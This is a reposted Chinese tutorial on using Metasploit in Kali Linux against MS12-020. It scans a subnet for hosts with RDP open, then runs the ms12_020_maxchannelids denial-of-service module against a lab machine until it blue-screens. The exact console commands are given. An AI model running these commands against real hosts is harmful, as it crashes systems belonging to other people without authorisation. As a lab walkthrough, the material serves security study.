找回密码
 立即注册
Qt开源社区 门户 查看内容

Kali Linux实战篇:如何利用MSF渗透测试框架实战蓝屏攻击【MS12-020漏洞利用】

2019-7-13 05:07| 发布者: admin| 查看: 2104| 评论: 0

摘要: 声明:本公众号【白帽课堂】所有分享,仅限学习交流!请勿他用!!打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端输入search ms12-020,这条指令是搜索ms12-020模块上面那个auxiliary/dos/windows/rd ...
声明:本公众号【白帽课堂】所有分享,仅限学习交流!请勿他用!!



打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端
输入search ms12-020,这条指令是搜索ms12-020模块



上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块
输入use auxiliary/scanner/rdp/ms12_020_check
然后我们show options一下



由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.0.143
所以输入set RHOSTS 192.168.0.1/24

然后输入run或者exploit开始查找



我们可以看到它已经再开始查找了,我们发现192.168.0.143前面是绿色的+,这是开启的意思。



这时候我们就可以使用上面提到的auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块了
输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
然后set RHOST 192.168.0.143(也可以先show options)
最后run



观测03靶机已经蓝屏了,重启就好了!






学习更多白帽子网络攻防与编程好课,可点击【阅读原文】前往!


----------------------------------------------------------------------------------------------------------------------
我们尊重原创,也注重分享,文章来源于微信公众号:白帽课堂,建议关注公众号查看原文。如若侵权请联系qter@qter.org。
----------------------------------------------------------------------------------------------------------------------

鲜花

握手

雷人

路过

鸡蛋

公告
可以关注我们的微信公众号yafeilinux_friends获取最新动态,或者加入QQ会员群进行交流:190741849、186601429(已满) 我知道了